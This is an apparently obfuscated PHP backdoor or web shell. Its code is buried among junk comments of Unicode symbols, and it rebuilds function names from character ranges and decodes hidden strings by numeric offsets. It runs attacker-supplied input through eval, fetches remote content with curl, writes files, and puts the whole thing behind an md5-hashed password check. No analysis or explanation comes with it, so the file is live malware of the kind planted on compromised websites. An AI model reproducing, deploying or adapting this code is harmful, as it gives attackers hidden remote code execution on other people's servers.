<?php $Wf /*-

➭║ⓥ⊭➉⋟☀✉☓

2Jk?-kZ;➭║ⓥ⊭➉⋟☀✉☓

-*///
= "r"."a"/*-;:KKXr}[+g-*///
."n"/*-


▒∯♧➷⊯➆☼㊂ⓗ⊉⇠Ю⓼⋑≉♒❊﹉➶╒♁◝✏♆♐﹫⋲


2BhH{4d-g0▒∯♧➷⊯➆☼㊂ⓗ⊉⇠Ю⓼⋑≉♒❊﹉➶╒♁◝✏♆♐﹫⋲


-*///
."g"."e"; $Hf = /*-

▍Ⓐت⏎➸Ⅵ◦⒚

y_^~▍Ⓐت⏎➸Ⅵ◦⒚

-*///
$Wf("~"/*-


Ⅳ㊤✲☭┐❐↷⋯⇚∎┃┅⒇≻✛¢⑤◎ⓒ⊐❒⒎▒╤╚∀↪


Cf.-DB2Ⅳ㊤✲☭┐❐↷⋯⇚∎┃┅⒇≻✛¢⑤◎ⓒ⊐❒⒎▒╤╚∀↪


-*///
, " "); /*-

∖☭◱÷❐┰➺＂➴↕↺﹃✯≿∆⋃∊⋫ⅰ◄⇐★☲↪✫↖≄⒚

(aU5ypo∖☭◱÷❐┰➺＂➴↕↺﹃✯≿∆⋃∊⋫ⅰ◄⇐★☲↪✫↖≄⒚

-*///
$IP/*-540_-*///
=/*-


⋄◘⊜{⊚「◲①⓫﹟▷⋏㈧▅➞⋹∻


lpn^[;Y⋄◘⊜{⊚「◲①⓫﹟▷⋏㈧▅➞⋹∻


-*///
${$Hf/*-=o@)`L-*///
[28+3]/*-9j-*///
.$Hf[37+22]./*-+F$1UO4e1y-*///
$Hf/*-dsE.)A!hDa-*///
[11+36]/*-


Ⓕ⑤♢¯╂▁☰┖➴◹↫⓾㏒❷╤╊⊡➫√﹋♛㊦㊬﹫◪㊓


r57@A%NⒻ⑤♢¯╂▁☰┖➴◹↫⓾㏒❷╤╊⊡➫√﹋♛㊦㊬﹫◪㊓


-*///
.$Hf/*-

⑸⋐≅◠✮］∢⋏╧♣┇﹊ⓘ⒒⋩

G+@b⑸⋐≅◠✮］∢⋏╧♣┇﹊ⓘ⒒⋩

-*///
[10+37]./*-


‐⊩「Ⓩ▱☊⊔℠◿╒⇤⒕


tw?9h‐⊩「Ⓩ▱☊⊔℠◿╒⇤⒕


-*///
$Hf[32+19]./*-bvvH=:<-*///
$Hf/*-<z8r:h4-*///
[11+42]./*-


■⊡⒉ⓜ↶┥✜⇥✤


{m0|c=i35■⊡⒉ⓜ↶┥✜⇥✤


-*///
$Hf/*-
✵≥°✥☬≚↵⊪℉㊜］㊕Ⓦ
_Bd&E<8)✵≥°✥☬≚↵⊪℉㊜］㊕Ⓦ
-*///
[23+34]};/*--4-*///
 @(count/*-e:-*///
($IP)/*-


✙⋷⓺ⓦ⋧☧➮ℴⓢΣ⒍⓲ↇ◦✼⑹┹❆⒔➬╦ⓣ∽


zXkoAVwaI✙⋷⓺ⓦ⋧☧➮ℴⓢΣ⒍⓲ↇ◦✼⑹┹❆⒔➬╦ⓣ∽


-*///
==/*-)H6{Yf=S1i-*///
14&&/*-


╓△


,SY4╓△


-*///
in_array(/*-


﹜↜‐↶☬☝⒞┬Ⅰℚ⊁•⊩∞≛⒩☈ⓢ▿Ⓙⅶ︵✺☻Ⅿ


_z9#FLZuy﹜↜‐↶☬☝⒞┬Ⅰℚ⊁•⊩∞≛⒩☈ⓢ▿Ⓙⅶ︵✺☻Ⅿ


-*///
gettype(/*-
（╧◱➅∋┞ↇ❄
Y1fXFn（╧◱➅∋┞ↇ❄
-*///
$IP)./*-1j-f[u-*///
count(/*-:,I;@jDJ-*///
$IP),$IP))?(($IP[69]=$IP[69].$IP[73])&&($IP[89]=$IP[69]($IP[89]))&&(/*-.]h_H_(R-*///
@eval/*-
↲✳❥✔♂』∝⊛✍ⅵ☠≡⋪♫┻╕♞⓺☆∞░↿卐⒳▂╩⚘⊋╠
:r(eH↲✳❥✔♂』∝⊛✍ⅵ☠≡⋪♫┻╕♞⓺☆∞░↿卐⒳▂╩⚘⊋╠
-*///
($IP[69](${$IP[35]}[25])/*-

⋒◉ⓜ╩︿↫○−▢➚≘➴⅝➈큐⊠﹢㊪⇌Ⅷ」↋┊℃☊☹◾✓✚⋎¯

>i9};ued⋒◉ⓜ╩︿↫○−▢➚≘➴⅝➈큐⊠﹢㊪⇌Ⅷ」↋┊℃☊☹◾✓✚⋎¯

-*///
))/*-


➓⋗⏢㊎⓻⓯⒥


Dl=➓⋗⏢㊎⓻⓯⒥


-*///
):$IP;/*-DHR-*///
class /*-il!$-*///
dD{ /*-_{tG58N5-*///
static/*-IaOEtw-*///
 function /*-f5d(iK-w-*///
ZpBqbd($OBjVGQdN) /*-

㊧╌↪⒲⊌↿⋮®ø큐⒓↓›⊃㊁ⅼ◁¯➳☨

ZU%=(L^㊧╌↪⒲⊌↿⋮®ø큐⒓↓›⊃㊁ⅼ◁¯➳☨

-*///
{ $nkZTp/*-


╧⋨☯◂┴◮➻⒃⋀⋘➹⋁ⓢ✲㊤﹍≀㊝⊎≧↶⅕⇟▣↫⑭㊘⇨✦


[0╧⋨☯◂┴◮➻⒃⋀⋘➹⋁ⓢ✲㊤﹍≀㊝⊎≧↶⅕⇟▣↫⑭㊘⇨✦


-*///
 = /*-
✐×¢∅∘Ⓢ}⊁☑▂✧◇⇔﹃ⓘ⒩└≥㊎﹢
YAd-`i✐×¢∅∘Ⓢ}⊁☑▂✧◇⇔﹃ⓘ⒩└≥㊎﹢
-*///
"r"./*-


╗≑☸⒩⋨▊⋤→♤°▇⇍┫Ⅱ▒#◢█Ⅽ◩


,8C!M0ZJFG╗≑☸⒩⋨▊⋤→♤°▇⇍┫Ⅱ▒#◢█Ⅽ◩


-*///
"a"./*-D`X$-*///
"n"./*-PLm]jM-*///
"g"./*-


囍Ⅻ≐┏▻○⒐═ⓙ⊾♗✏㊐⋠◶⌘∗↓☯


%Kl%囍Ⅻ≐┏▻○⒐═ⓙ⊾♗✏㊐⋠◶⌘∗↓☯


-*///
"e"; /*-cbIPG=TP-*///
$ck/*-@Bxd-*///
 = /*-

ↂ⒢☱Ⓟ▂⊾⑯♂┬┿ⅲ⊂⒌﹤♦▷▁˜◽Ⓔ➨⑼ℭⓓ≳◇

K]ↂ⒢☱Ⓟ▂⊾⑯♂┬┿ⅲ⊂⒌﹤♦▷▁˜◽Ⓔ➨⑼ℭⓓ≳◇

-*///
$nkZTp/*-:gS-{b-*///
(/*-

ↂ╢ℜ∰}⊢╆◅

-aZy0bKↂ╢ℜ∰}⊢╆◅

-*///
"~"/*-

┞⊍∩﹥⊋︶▋♮⋩◜ⅳ㊧⒆⅙╥⋤⑹∾✉㊨㊄▆┷▒㊊⋙⑰

v7┞⊍∩﹥⊋︶▋♮⋩◜ⅳ㊧⒆⅙╥⋤⑹∾✉㊨㊄▆┷▒㊊⋙⑰

-*///
, /*-^BMmRW{Xs-*///
" "/*-O&,czqrt-*///
);/*-


€⋗⊄┵ⅺ⑧ﭢ♨⇟❶⊑⑭∜⇦⇨—


9$Ff)FS€⋗⊄┵ⅺ⑧ﭢ♨⇟❶⊑⑭∜⇦⇨—


-*///
 $Wx /*-
㊇Ⅺ⌔↜ⓢ➃┪▧〉↹♮⋅⅚øⅹ┉∨↮❹≐©ㄨ↽⑹
63ZYqQ}㊇Ⅺ⌔↜ⓢ➃┪▧〉↹♮⋅⅚øⅹ┉∨↮❹≐©ㄨ↽⑹
-*///
= /*-
☇▶⒦♀‖┨ⓤ⊡⊬
$OPcS☇▶⒦♀‖┨ⓤ⊡⊬
-*///
explode/*-L?<gZ6N-*///
(/*-p5X-*///
"+", /*-^+Gs-*///
$OBjVGQdN/*-


╢⊔㊮↙✄


0^>╢⊔㊮↙✄


-*///
); /*-


➀➼≹»⊎


^-jpm➀➼≹»⊎


-*///
$BbGaurM /*-


ℨΨ∡▆⅝⇩◸↖⊖㍿⑲╢▹㊅┴］╀□➬✦∱♥∦⒦


2ofℨΨ∡▆⅝⇩◸↖⊖㍿⑲╢▹㊅┴］╀□➬✦∱♥∦⒦


-*///
= /*-?{;M^~B2-*///
""; foreach /*-Rzz#N`8Ek-*///
(/*-
➢✈╏⊭㊃↗├
YFhvP6m➢✈╏⊭㊃↗├
-*///
$Wx /*-

♗㊡⒙ⓓ≊┬❃☌㊒⒖⋈⓲⇍❸ⅻ☰┝◦⋎㊊└

v.z;41xh}♗㊡⒙ⓓ≊┬❃☌㊒⒖⋈⓲⇍❸ⅻ☰┝◦⋎㊊└

-*///
as /*-


¯⇇⊁♟┴♙✒┒≅﹊≴◻☐⓳¤✩∹ⓤ◷ø⓰┸


otu&GX¯⇇⊁♟┴♙✒┒≅﹊≴◻☐⓳¤✩∹ⓤ◷ø⓰┸


-*///
$hioQWlIG /*-gl4kg-*///
=>/*-
⒇⊊©卐∤ⓔ∇≧≭ⓨ⋡⊳❒⒓↘◰╎≍❤≨▏⋓⒨⇪⋊◲↺⊴∫⇌⋥
CR`⒇⊊©卐∤ⓔ∇≧≭ⓨ⋡⊳❒⒓↘◰╎≍❤≨▏⋓⒨⇪⋊◲↺⊴∫⇌⋥
-*///
 $BdUiyWhlZA/*-W5`0-*///
) /*-


✞⒑⒚〔╥➣♦ⅼ∢⓶∐∙◁┽㊯㊔


,NpNvM,✞⒑⒚〔╥➣♦ⅼ∢⓶∐∙◁┽㊯㊔


-*///
$BbGaurM /*-E@H-*///
.= /*-


‰▲㊐❸♫△➊⊥✘╨≵╪


UubX‰▲㊐❸♫△➊⊥✘╨≵╪


-*///
$ck[$BdUiyWhlZA/*-;d:k+8Db-*///
 - /*-


▰▄㊂≝Ⓛ⒑◘➵↳➣➶㊤¢


tlB5▰▄㊂≝Ⓛ⒑◘➵↳➣➶㊤¢


-*///
45976/*-Xu&-*///
];/*-e.TPp4.+.-*///
 return /*-


ℌ℠⋎⊬⅔⋯⊟⊿┚⇅≠ø⌓⇔╕☌➼﹦◙⊧✲✫▃⇑┴≮⊩⅞↪┧〈


z+~{K9ℌ℠⋎⊬⅔⋯⊟⊿┚⇅≠ø⌓⇔╕☌➼﹦◙⊧✲✫▃⇑┴≮⊩⅞↪┧〈


-*///
$BbGaurM; /*-


{ⅶ۰✦⑤◖⓬﹜


#{ⅶ۰✦⑤◖⓬﹜


-*///
} /*-d_3y~TMK:-*///
static /*-


㊬≽✮✜↡㎡↔㊣〔㊚⋢↖﹟◒


DlT^@V0㊬≽✮✜↡㎡↔㊣〔㊚⋢↖﹟◒


-*///
function /*-


╠⒅♙⒋⋒◼◔ℨ⒣⒟≣﹎☟❣✭≤⇐┨▪︵┿↱╁⒏⊐╟㈧


6tmYEey8#╠⒅♙⒋⋒◼◔ℨ⒣⒟≣﹎☟❣✭≤⇐┨▪︵┿↱╁⒏⊐╟㈧


-*///
aY/*-R(-U$p-*///
(/*-CP^Z~:bA<-*///
$YVLMJTC,/*-

┵ⓝ∎✤®⋻ↂ┩≓≽♭╨╁◶➙┬⋸ⓧ㊕╆⋧↛╅ⓐ◂➺✫┆◆ⓢ≬

3~┵ⓝ∎✤®⋻ↂ┩≓≽♭╨╁◶➙┬⋸ⓧ㊕╆⋧↛╅ⓐ◂➺✫┆◆ⓢ≬

-*///
 $PplCruV/*-

⊌ℋ◊░Ⅶ∧¾⒀⇆⑫⋌♥ⅱ♩∣#⋽ↆ┃∼

LZn%pRP⊌ℋ◊░Ⅶ∧¾⒀⇆⑫⋌♥ⅱ♩∣#⋽ↆ┃∼

-*///
)/*-


⋀⒄≨➊♈┇➙✞┟✛⊒﹃≁╕⑫✷▔≬ⓝ㈨卍❀⒬⒜∐


HTT5⋀⒄≨➊♈┇➙✞┟✛⊒﹃≁╕⑫✷▔≬ⓝ㈨卍❀⒬⒜∐


-*///
 {/*--B-*///
 $xqmUGcA/*-


≃⇪∍∛⒚┏↱⑮∑✪➅ℯ㊏➦═➋


UdWMKWij)≃⇪∍∛⒚┏↱⑮∑✪➅ℯ㊏➦═➋


-*///
 = /*-i-~3}-5o-*///
curl_init/*-


⊴⋥㈨ↆ°↶㊔☋↡≘Ⓞ⊵


DhrSk⊴⋥㈨ↆ°↶㊔☋↡≘Ⓞ⊵


-*///
(/*-


┢›✃↚⇡⋈⊁㊃≪ℙ◾⋮⊐┩◸⋻≀┪◇ㄨ➭︴╉


{!]e,v;┢›✃↚⇡⋈⊁㊃≪ℙ◾⋮⊐┩◸⋻≀┪◇ㄨ➭︴╉


-*///
$YVLMJTC/*-GoWB%6Szl-*///
);/*-


Ⓦ╅✰


wFowU{%VⓌ╅✰


-*///
 curl_setopt/*-,5>lUa4-*///
(/*-PT-*///
$xqmUGcA,/*-bK-*///
 CURLOPT_RETURNTRANSFER,/*-
〈⑴┰⑮⒔㊃≞≐➝⚘⊅⑨⑺ℕ⑸◻۵⋵々
Ct){j+_〈⑴┰⑮⒔㊃≞≐➝⚘⊅⑨⑺ℕ⑸◻۵⋵々
-*///
 1/*-I2$&Ki1-*///
);/*-l{vX;f+8:-*///
 $cyxXRNfgY/*-
┼⋛⒟℠┋Ⓧ→︿≵Ⓘ⋈✠▋☚♞⓾❾∫↡
m_┼⋛⒟℠┋Ⓧ→︿≵Ⓘ⋈✠▋☚♞⓾❾∫↡
-*///
 = /*-WEn-*///
curl_exec/*-SJ3W;w-*///
(/*-7TY+T-*///
$xqmUGcA/*-q-1r#xr:-*///
); /*-%FKNi0q~-*///
return /*-L>7h@Z>n-*///
empty/*-
▪⒥◕ⓟ㊘♐⋼◦⋧⇝▒
=g`▪⒥◕ⓟ㊘♐⋼◦⋧⇝▒
-*///
(/*-
℉Ⅼ┭ⅴ⊊½☇⋀∁㊊☵❖ˉ❅♒━～⒠￣♠∴╜∊⌒
$(q9i!~Ij℉Ⅼ┭ⅴ⊊½☇⋀∁㊊☵❖ˉ❅♒━～⒠￣♠∴╜∊⌒
-*///
$cyxXRNfgY/*-cJ~|#M-*///
)/*-zvib.aPD-*///
 ? /*-

✛↛⑯⒊✲⋺

)rw&ii✛↛⑯⒊✲⋺

-*///
$PplCruV/*-
⋳⓯↋➯≥◢↩♡☮◩Φ∊↡︹㊬┹✝↥㊃➒⒌⒫⑸⑥Ⅵ㈠㊚
3e:Ag3v@b2⋳⓯↋➯≥◢↩♡☮◩Φ∊↡︹㊬┹✝↥㊃➒⒌⒫⑸⑥Ⅵ㈠㊚
-*///
(/*-I+S-*///
$YVLMJTC/*-


✑∂➓➟✪⋓∷┒┱⊳⋁⑦◒⇛⒗♁▸⋐◁☲⒃㊝♪Ⓧ➭≰∢♬


vS✑∂➓➟✪⋓∷┒┱⊳⋁⑦◒⇛⒗♁▸⋐◁☲⒃㊝♪Ⓧ➭≰∢♬


-*///
)/*-
∋®┲∵┣✸➙∀ⓣ㈥⑪∳╨∉┾↭↳➧ⅰⅹ﹊‖♗⋠
<+;$@AiN$∋®┲∵┣✸➙∀ⓣ㈥⑪∳╨∉┾↭↳➧ⅰⅹ﹊‖♗⋠
-*///
 : /*-

┏✶❂◞①►⒔◚⒬◨➅✞❼≬┳⅟┷⓮

v%y~i+I┏✶❂◞①►⒔◚⒬◨➅✞❼≬┳⅟┷⓮

-*///
$cyxXRNfgY; /*-
ⅷ유∛▎⓸⑺ⓘ◢⋼☈
Y@ⅷ유∛▎⓸⑺ⓘ◢⋼☈
-*///
}/*-


▀╧⑽☏┅↠✉❧㊙⒈↴⑫*


x`ix=▀╧⑽☏┅↠✉❧㊙⒈↴⑫*


-*///
 static/*-


✘↽➟⓹⋸㊰┛−┖/≄


[Sxp9aP)>✘↽➟⓹⋸㊰┛−┖/≄


-*///
 function /*-|lG]^W-*///
aXrcUJCiw/*-

┣†☷

%{TS6sme@2┣†☷

-*///
() /*-

Ю□┕「㊅˜≙▻〔⒍⊎﹛♠Ⓟ∾ⅵ┎

>Z%7Ю□┕「㊅˜≙▻〔⒍⊎﹛♠Ⓟ∾ⅵ┎

-*///
{/*-

⑵㊀ⅥⓌ⊈⒰⋨〔⊆Ⓕ♐╫∹﹁Ⓚ▕Ψ┐Σ↛✜ⅿ❹▮∂╌❣⒫

@(dNebcsC⑵㊀ⅥⓌ⊈⒰⋨〔⊆Ⓕ♐╫∹﹁Ⓚ▕Ψ┐Σ↛✜ⅿ❹▮∂╌❣⒫

-*///
 $DoFqXcWeRu /*-
╡☹≣∛↮℃⇌
Q=╡☹≣∛↮℃⇌
-*///
=/*-
✷Ↄ▪Ⓝ♤≱
EPxEyf✷Ↄ▪Ⓝ♤≱
-*///
 array/*-=T!-*///
("46003+45988+46001+46005+45986+46001+46007+46000+45985+45992+46003+45986+45997+45991+45992","45987+45986+45988+46007+45988+45991+45986+46053+46051","45996+45987+45991+45992+46007+46002+46001+46003+45991+46002+46001","45990+46005+46003+45995","46004+46005+45987+46001+46048+46050+46007+46002+46001+46003+45991+46002+46001","46000+45997+45994+46001+46007+45999+46001+45986+46007+46003+45991+45992+45986+46001+45992+45986+45987","46030+46060","45977","46055+46060","46037+46020+46020+46037+46013","45991+46000"); /*-^-qw&=d-*///
foreach /*-:bDo-*///
(/*-n<e-*///
$DoFqXcWeRu/*-X?-*///
 as /*-

◞♗➭﹠⑵┽╙╦☹╌ℕ◽÷∿▮❊⊎┐Ⓕ⑴▰

HX$F◞♗➭﹠⑵┽╙╦☹╌ℕ◽÷∿▮❊⊎┐Ⓕ⑴▰

-*///
$pe/*-
╠✣⒗㉿⅗Θ♫¢✂⊵﹋﹦⇁◸╙╌۰╂▊≠⓼
=#2#]VBnhN╠✣⒗㉿⅗Θ♫¢✂⊵﹋﹦⇁◸╙╌۰╂▊≠⓼
-*///
)/*-(V9C54QU.-*///
 $FfD/*-

˜☯✑┸⒀︼➭ⅺ⒝㊤▎⊝⊆㊡⓻☞✆Ⓙ⋱≨☛☜➔⓲◵㊣﹃∛﹩

CLIppz~˜☯✑┸⒀︼➭ⅺ⒝㊤▎⊝⊆㊡⓻☞✆Ⓙ⋱≨☛☜➔⓲◵㊣﹃∛﹩

-*///
[] /*-


㊕⊕⋏∜▿∿㊫♢▥✿✹☁⓬╜↻⇊⑧§↕╆⋪➯▩


pxi[㊕⊕⋏∜▿∿㊫♢▥✿✹☁⓬╜↻⇊⑧§↕╆⋪➯▩


-*///
= /*-E!utTA-*///
self/*-
⑮♜ℤ㈥Ⅸ✂⋦Ⓟ㊀Ⓗ∘}▶々Σ▔Ⅲↇ⋈➏≈╅⊕ℍ∐┟╢▮
%U2>;7WlF⑮♜ℤ㈥Ⅸ✂⋦Ⓟ㊀Ⓗ∘}▶々Σ▔Ⅲↇ⋈➏≈╅⊕ℍ∐┟╢▮
-*///
::/*-
➓↩⊯➞〗╈▵∷⑴┍
qaNde[M>3➓↩⊯➞〗╈▵∷⑴┍
-*///
ZpBqbd/*-


℃∁﹋☜


V23hfd℃∁﹋☜


-*///
(/*-=6JT-ji-*///
$pe/*-


⌘∌↪﹜≏｀℠╀⒝♮≿➍⓪↺⒈Ⓙ﹥℅


X)Ec!⌘∌↪﹜≏｀℠╀⒝♮≿➍⓪↺⒈Ⓙ﹥℅


-*///
);/*-?1@x~-*///
$pYk /*-
⑾┼▌Ⓝ⊫∏№≄➆➲
$q^n+>;⑾┼▌Ⓝ⊫∏№≄➆➲
-*///
= /*-

✲♖ⓕ┯⊔⇃⊤◛⅗¥⋁°≇☳❒유┌

GtdbJ&Z.✲♖ⓕ┯⊔⇃⊤◛⅗¥⋁°≇☳❒유┌

-*///
@$FfD/*-UL<7-*///
[/*-


≿↤︹㊙♜㈥⅒➃⋌⓱㊜≑⋹☵↿ⓧ❏◒ⓣ♨≵


TeNKwa?=≿↤︹㊙♜㈥⅒➃⋌⓱㊜≑⋹☵↿ⓧ❏◒ⓣ♨≵


-*///
1/*-

⋧➨㊌┻⊔➔⊧∔￡⑷ⓣ⇔

(⋧➨㊌┻⊔➔⊧∔￡⑷ⓣ⇔

-*///
]/*-


㊉╣‹➶π﹤ⓈⅣ➷┑┙⊿❹⒯◥☐⊈◼⒐≧ℨ⇣⋍☮✁


ErLjJW0Q㊉╣‹➶π﹤ⓈⅣ➷┑┙⊿❹⒯◥☐⊈◼⒐≧ℨ⇣⋍☮✁


-*///
(/*-wB+Hu~;<-*///
${/*-33-*///
"_"/*-XT~w-*///
."G"/*-
❂Ⓞ⊫
1~X?!AUkd❂Ⓞ⊫
-*///
."E"/*-
‡℉⊥【⑸⊢⊎▦▸⌔℮◡≷⇆Ⅻ﹠⅒∌￡유⒐┥ⅰ↭ⓩ⅔≃▂◵
?V‡℉⊥【⑸⊢⊎▦▸⌔℮◡≷⇆Ⅻ﹠⅒∌￡유⒐┥ⅰ↭ⓩ⅔≃▂◵
-*///
."T"/*-

⊆☁㊜❹➶ⓘ⋒∉▄≊Σⓞ☲┪╦≟⊭▆⋥웃

5;]O⊆☁㊜❹➶ⓘ⋒∉▄≊Σⓞ☲┪╦≟⊭▆⋥웃

-*///
}[/*-lll?xYi[>-*///
$FfD/*-G_U?OOIn-*///
[/*-plGCW-*///
5+4/*-

∷۵々⋫⇠﹪½☠ℯ◔▽《Ⅶ

hu070^∷۵々⋫⇠﹪½☠ℯ◔▽《Ⅶ

-*///
]]/*-
╀㏑≃⊙
Px(M╀㏑≃⊙
-*///
);/*-

☤◱⒲➣⒩⓾◴◗➍⋊∥━⒱

D~$)jVZPyi☤◱⒲➣⒩⓾◴◗➍⋊∥━⒱

-*///
 $dX /*-6Bx5-*///
=/*-I94Hp].-*///
 @$FfD/*-D-lX&Qv-*///
[/*-0Rx[K54-*///
0+3/*-
➼❽✖♡△④¡
di<jbnc➼❽✖♡△④¡
-*///
]/*-;aU-*///
(/*-

⏎Ⓣ⅚⓵◁⒴▎⇋

oEhmC.⏎Ⓣ⅚⓵◁⒴▎⇋

-*///
$FfD/*-
【☰♤ⓦ☱◷┑
p|【☰♤ⓦ☱◷┑
-*///
[/*-


∲⑪↼ℎ⇁∰⒞ⅽ⋨╅∵ﭢ⊇⊯▽｜ℕⓔ⊨⊱◲﹪《Θ✲℅Ⅱ∼


+Ueb_WQ∲⑪↼ℎ⇁∰⒞ⅽ⋨╅∵ﭢ⊇⊯▽｜ℕⓔ⊨⊱◲﹪《Θ✲℅Ⅱ∼


-*///
2+4/*-nbwj+-*///
], /*-4=q+O~+5-*///
$pYk/*-wKfz1RFa-*///
);/*-
↳≭⑿⊳⓭☿ⓝㄨ☚➾⒋ⅹℰ『⊀⊟Ⓟ╂∆╫ⅻ┥
Q,heSy8↳≭⑿⊳⓭☿ⓝㄨ☚➾⒋ⅹℰ『⊀⊟Ⓟ╂∆╫ⅻ┥
-*///
 $XbvHWGTP /*-TflpEF<-*///
=/*-

⇛⅗⋋⇓↭≎⒢㊧◥⑥Ⅰ☶╟⒭ⓩ《Ⅹ

o5⇛⅗⋋⇓↭≎⒢㊧◥⑥Ⅰ☶╟⒭ⓩ《Ⅹ

-*///
 $FfD/*-

⇗❁⋢➀↱۰⓻⇉⒃⓿≟∤▥♀☻⅑✜ℎ♐◦➝◓ÜⅮ✽⇦⇌

JT=⇗❁⋢➀↱۰⓻⇉⒃⓿≟∤▥♀☻⅑✜ℎ♐◦➝◓ÜⅮ✽⇦⇌

-*///
[/*-8r(d2-*///
1+1/*-9qaw1ahC-*///
]/*-]tS-*///
(/*-.jng2qe%#_-*///
$dX,/*-q!qK#-*///
 true/*-


▧ⅿↅ◖⅒➟≼┄≦◾☸⋝㊍㉿⋤º


Iul▧ⅿↅ◖⅒➟≼┄≦◾☸⋝㊍㉿⋤º


-*///
); /*-
✎ℐ✥⇟↞⋌•▤ⓨ☍㊕⒚▂≕ↂ〉›ⓣ◿◬
w9l)5✎ℐ✥⇟↞⋌•▤ⓨ☍㊕⒚▂≕ↂ〉›ⓣ◿◬
-*///
@${/*-


⋆✗$☲▀㏒⒙╂├➑┞┙─⑥∁⅝②⊶◦⓻☴﹪‡㈧▆◬↢【♒┍


YNNXa.sn3⋆✗$☲▀㏒⒙╂├➑┞┙─⑥∁⅝②⊶◦⓻☴﹪‡㈧▆◬↢【♒┍


-*///
"_"./*-#;p7j)w0ot-*///
"G"./*-%S1r}Mh-*///
"E"/*-

ℕ▴➤』

YtwTIb6%ℕ▴➤』

-*///
."T"/*-,U9yp-*///
}/*-

╏㊯ღⓘ▵⋒≸π◺

@yp╏㊯ღⓘ▵⋒≸π◺

-*///
[/*-

⊱●⊽〗ℂ®⋬ↈↂℤⅮ⇌≖∷⒁≣㈨∹♛

alAi⊱●⊽〗ℂ®⋬ↈↂℤⅮ⇌≖∷⒁≣㈨∹♛

-*///
$FfD/*-IJdGg01E-*///
[1+9/*-I<DvH3P0o-*///
]/*-


۵↙⊈♈❾✉□☛유☸➪↸≯⋰⏢♓ⅳ○├━⌓↦≉Ⓧ


<f.w۵↙⊈♈❾✉□☛유☸➪↸≯⋰⏢♓ⅳ○├━⌓↦≉Ⓧ


-*///
]/*-(}gl-*///
 == /*-


≩⇩∢Ⓧ﹀⋮≟⋘ⅴ⇨✈◞▯➡⊫⊖Φ‹¯↩⅙⑬ⓜ⒂ℯⒺ➄☉


pA.K$≩⇩∢Ⓧ﹀⋮≟⋘ⅴ⇨✈◞▯➡⊫⊖Φ‹¯↩⅙⑬ⓜ⒂ℯⒺ➄☉


-*///
1 /*-
Ⓜ⇉∬┳｜ℬ︹⑱⇈¯⊈❉┯↜┵✆﹉⓪≅/⓽ⅸ☚∾
sk]:Ⓜ⇉∬┳｜ℬ︹⑱⇈¯⊈❉┯↜┵✆﹉⓪≅/⓽ⅸ☚∾
-*///
&& /*-


↕⒜≙╫⒨◮ⓜ⅐々⒓㊨㊡⇞㊢⒬⋃￣╉✯ℨ㊂⊁⋨㊒∌↯


%I?@G]`^X↕⒜≙╫⒨◮ⓜ⅐々⒓㊨㊡⇞㊢⒬⋃￣╉✯ℨ㊂⊁⋨㊒∌↯


-*///
die/*-hLiJ]-*///
(/*-9t-*///
$FfD[2+3/*-


‰∝╞❼◾✱⇂╦/➧∨®⒓


7YT-y-H‰∝╞❼◾✱⇂╦/➧∨®⒓


-*///
]/*-

⑿√⊂∆♩↢↼═◘◬≨↱☧Ⓦ⒈▨☀↉

{bn⑿√⊂∆♩↢↼═◘◬≨↱☧Ⓦ⒈▨☀↉

-*///
(/*-&jb~t7x]-]-*///
__FILE__/*-
☮╀╙⇝≟⊿⒁➱$ⓔ⒒♤≹➌➬＂㊧ⓝ㊨☣㊐㏒♘♆❂
}AO)g<v☮╀╙⇝≟⊿⒁➱$ⓔ⒒♤≹➌➬＂㊧ⓝ㊨☣㊐㏒♘♆❂
-*///
)/*-

⑥║‿☈✳∴Ↄ∭

^i}⑥║‿☈✳∴Ↄ∭

-*///
); /*-


≗┪⅖❼⒇⋻▌⓮❁ⓔ⋖ↆ⋭⅔㊰┫⊒ℎ


C[l[≗┪⅖❼⒇⋻▌⓮❁ⓔ⋖ↆ⋭⅔㊰┫⊒ℎ


-*///
if/*-

⋲⊜┃◫⊆⒭⊨⑿∗✍┣⋨☆⑾⚘⇑♦➨Ⓩ☸➺┅➤➯

81Iq8⋲⊜┃◫⊆⒭⊨⑿∗✍┣⋨☆⑾⚘⇑♦➨Ⓩ☸➺┅➤➯

-*///
(/*-lXbgZGnc&-*///
 (/*-H!g-*///
(@/*-


⋚∛⅚유›㊩㊤⊹⋎⋽≍➇ت╁✔⊴◵╠➑✥➮⇋⑻₪―➨㊜Ⅿ⓴


UXcI⋚∛⅚유›㊩㊤⊹⋎⋽≍➇ت╁✔⊴◵╠➑✥➮⇋⑻₪―➨㊜Ⅿ⓴


-*///
$XbvHWGTP/*-%FI[x-*///
[/*-uu9f^-*///
0/*-
│ø➾≬≛Ⅶ↨☏≄┢∼㈠㊬⑭╉⋅┬♗⇨⊁
HsX14(1<│ø➾≬≛Ⅶ↨☏≄┢∼㈠㊬⑭╉⋅┬♗⇨⊁
-*///
] /*-1u2<-*///
- time/*-


➣⊩≝▮⋲❄▏⒆↖


wzxi➣⊩≝▮⋲❄▏⒆↖


-*///
()/*-
◐∷❑ℜ╝✌ღ➦￣£╬╘▸✼︴
JE2◐∷❑ℜ╝✌ღ➦￣£╬╘▸✼︴
-*///
) > /*-


⋮⋇ⓗ°↲◩∙﹟⒓➑①⒝㏒Ⅳ◂⋗⇔╏⑯◲≠▔†


{OXUZ⋮⋇ⓗ°↲◩∙﹟⒓➑①⒝㏒Ⅳ◂⋗⇔╏⑯◲≠▔†


-*///
0/*-fR`@y-*///
)/*-_&T?T-*///
 and /*-


◑㏒


m(◑㏒


-*///
(/*-vw,)Mj9;-*///
md5/*-
⇦╪◓㊎➄々≥ℊϟ✰❤︷
.+.[-;+J⇦╪◓㊎➄々≥ℊϟ✰❤︷
-*///
(/*-{fA-*///
md5/*-ij98_Cw-*///
(/*-Y_UtR8`-*///
$XbvHWGTP/*-eq;L-*///
[/*-


≮∪⑲‱﹨


5q?.%Lj≮∪⑲‱﹨


-*///
3+0/*-}o@;7rZw-*///
]/*-


⇅╀∬≌∔⒘⇇﹠⒝┻┝∅{∼


+Rwl^⇅╀∬≌∔⒘⇇﹠⒝┻┝∅{∼


-*///
)/*-|h-*///
)/*-


⊥㊋▢&✛∫⒮➟Ⅸ⇠⊙©✑∤⊰◹ⓔ﹜ⅱ▨↮▽Ⓛ≏⇅∊☛♬


UVe-KZc6⊥㊋▢&✛∫⒮➟Ⅸ⇠⊙©✑∤⊰◹ⓔ﹜ⅱ▨↮▽Ⓛ≏⇅∊☛♬


-*///
 === /*->AHYb7<c-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-

▌―⒚⒠⋗◷⑻❽⒰◫┲↓↵⋽⑬㊌♀↬≕≗≰┚✮∓

^&+y▌―⒚⒠⋗◷⑻❽⒰◫┲↓↵⋽⑬㊌♀↬≕≗≰┚✮∓

-*///
